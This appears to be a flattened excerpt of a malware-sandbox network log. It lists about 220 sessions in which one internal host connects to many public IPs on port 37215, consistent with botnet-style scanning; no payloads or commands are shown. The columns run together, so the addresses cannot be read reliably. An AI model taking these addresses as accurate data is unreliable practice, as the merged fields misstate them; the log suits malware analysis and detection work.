                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15917192.168.2.2346350157.226.5.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15918192.168.2.233712841.162.182.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15919192.168.2.2340528157.57.166.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15920192.168.2.233957041.91.26.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15921192.168.2.235924441.128.180.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15922192.168.2.2346626197.131.174.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15923192.168.2.235292841.143.128.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15924192.168.2.235750641.27.121.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15925192.168.2.234927441.78.143.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15926192.168.2.2356886197.206.237.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15927192.168.2.2341790197.179.149.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15928192.168.2.2337852197.10.138.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15929192.168.2.2348558157.203.78.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15930192.168.2.2344316172.33.216.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15931192.168.2.234971243.66.11.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15932192.168.2.235946241.242.243.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15933192.168.2.234429441.134.150.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15934192.168.2.23334824.56.150.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15935192.168.2.2360570181.231.27.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15936192.168.2.234546241.14.238.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15937192.168.2.2339486157.2.56.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15938192.168.2.2358868121.211.145.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15939192.168.2.2349668197.8.182.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15940192.168.2.233819041.112.241.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15941192.168.2.2344326157.210.181.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15942192.168.2.2350098157.197.2.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15943192.168.2.2348754132.57.133.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15944192.168.2.2357752157.111.252.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15945192.168.2.235969041.187.194.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15946192.168.2.2344032117.34.95.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15947192.168.2.234346498.232.120.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15948192.168.2.2346712197.246.23.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15949192.168.2.233420041.151.60.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15950192.168.2.235770641.24.142.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15951192.168.2.2347732177.183.148.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15952192.168.2.234698840.35.143.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15953192.168.2.2344188157.198.106.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15954192.168.2.2357396197.48.32.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15955192.168.2.234576451.126.94.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15956192.168.2.233839041.199.115.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15957192.168.2.2346368157.161.26.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15958192.168.2.234411841.66.196.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15959192.168.2.235666041.148.161.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15960192.168.2.2351346157.247.159.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15961192.168.2.2345980197.37.33.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15962192.168.2.2347784157.167.33.15537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15963192.168.2.2354808157.93.177.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15964192.168.2.234613841.105.216.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15965192.168.2.233766041.206.131.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15966192.168.2.2338466167.176.105.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15967192.168.2.2346904197.157.37.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15968192.168.2.2341398143.204.105.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15969192.168.2.2339460220.85.15.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15970192.168.2.233374098.137.239.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15971192.168.2.234501457.239.152.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15972192.168.2.2360212157.255.124.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15973192.168.2.2351808157.87.9.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15974192.168.2.2336948157.173.196.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15975192.168.2.2352028100.137.174.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15976192.168.2.2336754197.78.41.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15977192.168.2.2334606197.49.255.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15978192.168.2.234820041.135.5.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15979192.168.2.2342440157.249.224.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15980192.168.2.233811641.250.237.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15981192.168.2.2352226126.177.137.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15982192.168.2.234225441.120.239.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15983192.168.2.234461041.193.141.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15984192.168.2.2339678197.121.66.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15985192.168.2.2350996197.80.214.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15986192.168.2.2340426197.78.59.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15987192.168.2.2339838197.125.174.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15988192.168.2.2345076157.112.24.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15989192.168.2.235097841.150.211.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15990192.168.2.234233241.231.229.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15991192.168.2.2351542197.93.123.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15992192.168.2.233562441.91.206.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15993192.168.2.235301641.196.46.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15994192.168.2.2336264157.149.218.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15995192.168.2.2357558157.220.108.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15996192.168.2.235675241.65.115.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15997192.168.2.2333998157.125.154.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15998192.168.2.2340076157.112.194.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15999192.168.2.2334006135.106.56.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16000192.168.2.2351798197.235.42.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16001192.168.2.2359036197.150.197.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16002192.168.2.233385820.243.136.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16003192.168.2.2352746197.8.105.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16004192.168.2.233415841.56.88.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16005192.168.2.2356484197.2.227.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16006192.168.2.2354234157.137.14.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16007192.168.2.2359324157.224.209.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16008192.168.2.2339632157.136.90.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16009192.168.2.2360532188.101.216.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16010192.168.2.2359698197.213.241.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16011192.168.2.233333041.223.227.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16012192.168.2.235125041.130.115.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16013192.168.2.235878441.231.5.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16014192.168.2.2351394197.231.16.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16015192.168.2.2357958109.199.5.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16016192.168.2.2360644197.117.39.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16017192.168.2.2344690197.154.114.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16018192.168.2.2359710197.80.240.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16019192.168.2.2348960160.3.213.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16020192.168.2.2339616157.193.97.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16021192.168.2.2359488157.59.88.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16022192.168.2.2337584157.4.98.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16023192.168.2.234090065.154.94.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16024192.168.2.235203425.136.236.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16025192.168.2.236086666.18.203.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16026192.168.2.2351332157.38.168.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16027192.168.2.2341000119.24.99.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16028192.168.2.2351508157.65.224.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16029192.168.2.2359594197.233.157.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16030192.168.2.235882882.254.141.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16031192.168.2.2343506157.249.206.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16032192.168.2.233988041.124.13.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16033192.168.2.2352128157.194.244.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16034192.168.2.2358000197.34.60.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16035192.168.2.2333720197.109.192.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16036192.168.2.2333434157.13.172.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16037192.168.2.2354558197.185.186.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16038192.168.2.2349080197.99.163.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16039192.168.2.2355706157.16.188.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16040192.168.2.233376099.208.122.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16041192.168.2.2342694157.89.94.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16042192.168.2.2333920197.21.64.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16043192.168.2.235572081.78.224.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16044192.168.2.2359464197.119.93.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16045192.168.2.234414241.38.246.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16046192.168.2.2345256197.218.255.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16047192.168.2.2345790197.233.124.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16048192.168.2.2345692161.96.20.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16049192.168.2.2347002102.25.116.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16050192.168.2.2352926157.164.51.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16051192.168.2.234764841.150.236.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16052192.168.2.2352936157.253.126.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16053192.168.2.233977441.196.23.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16054192.168.2.2333460157.11.152.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16055192.168.2.2354398103.75.128.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16056192.168.2.236011882.5.45.15537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16057192.168.2.2350874157.218.134.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16058192.168.2.2357104159.21.199.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16059192.168.2.235922493.154.178.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16060192.168.2.2338294157.95.72.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16061192.168.2.2343210114.233.64.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16062192.168.2.235947641.196.0.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16063192.168.2.233575241.10.240.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16064192.168.2.2351898197.104.98.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16065192.168.2.2342992190.57.211.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16066192.168.2.2356290197.8.216.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16067192.168.2.235019436.153.250.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16068192.168.2.2335190197.193.222.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16069192.168.2.2354612157.194.111.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16070192.168.2.235711241.108.6.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16071192.168.2.233457825.28.179.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16072192.168.2.2338566157.186.9.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16073192.168.2.2342150157.127.110.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16074192.168.2.233614841.201.254.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16075192.168.2.233837641.83.157.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16076192.168.2.2346348165.169.152.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16077192.168.2.2344386157.170.44.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16078192.168.2.2342944197.76.248.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16079192.168.2.235932641.27.47.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16080192.168.2.235693041.188.253.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16081192.168.2.233804441.78.14.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16082192.168.2.236022441.117.96.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16083192.168.2.2346984197.140.177.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16084192.168.2.2353394157.106.144.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16085192.168.2.2342098197.146.123.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16086192.168.2.234856690.55.56.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16087192.168.2.2351240197.43.71.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16088192.168.2.2347574197.157.110.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16089192.168.2.2349974157.204.125.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16090192.168.2.2350826184.190.3.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16091192.168.2.2339240157.94.28.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16092192.168.2.2344768103.138.51.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16093192.168.2.2346382188.34.156.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16094192.168.2.2333724157.135.240.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16095192.168.2.2344620197.228.33.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16096192.168.2.2343794197.13.78.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16097192.168.2.234499841.2.198.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16098192.168.2.2345886130.17.16.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16099192.168.2.2337928105.235.132.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16100192.168.2.2354468197.205.159.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16101192.168.2.2348504157.221.72.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16102192.168.2.2353418157.210.131.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16103192.168.2.2358428157.76.28.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16104192.168.2.234554041.127.194.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16105192.168.2.2357098197.77.233.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16106192.168.2.2343312157.224.63.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16107192.168.2.2354964197.122.132.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16108192.168.2.234644041.192.63.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16109192.168.2.233658648.11.149.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16110192.168.2.235831641.142.125.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16111192.168.2.2349388157.98.57.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16112192.168.2.2334386197.228.78.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16113192.168.2.2343906157.83.37.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16114192.168.2.2341560157.54.77.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16115192.168.2.2333166197.65.151.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16116192.168.2.2342172197.183.3.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16117192.168.2.2346008147.101.127.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16118192.168.2.233329641.109.78.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16119192.168.2.2360816157.19.247.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16120192.168.2.235664041.85.108.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16121192.168.2.2350440197.205.225.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16122192.168.2.2344548157.101.81.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16123192.168.2.235036625.152.22.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16124192.168.2.2338418197.226.35.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16125192.168.2.235178041.89.67.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16126192.168.2.2351894157.182.6.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16127192.168.2.2334370197.110.45.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16128192.168.2.234621441.6.61.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16129192.168.2.2349708128.43.26.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16130192.168.2.2355076197.153.172.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16131192.168.2.235391841.107.71.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16132192.168.2.2341146197.89.79.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16133192.168.2.2357212157.42.79.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16134192.168.2.235916641.58.159.23337215
                                          TimestampBytes transferredDirectionData


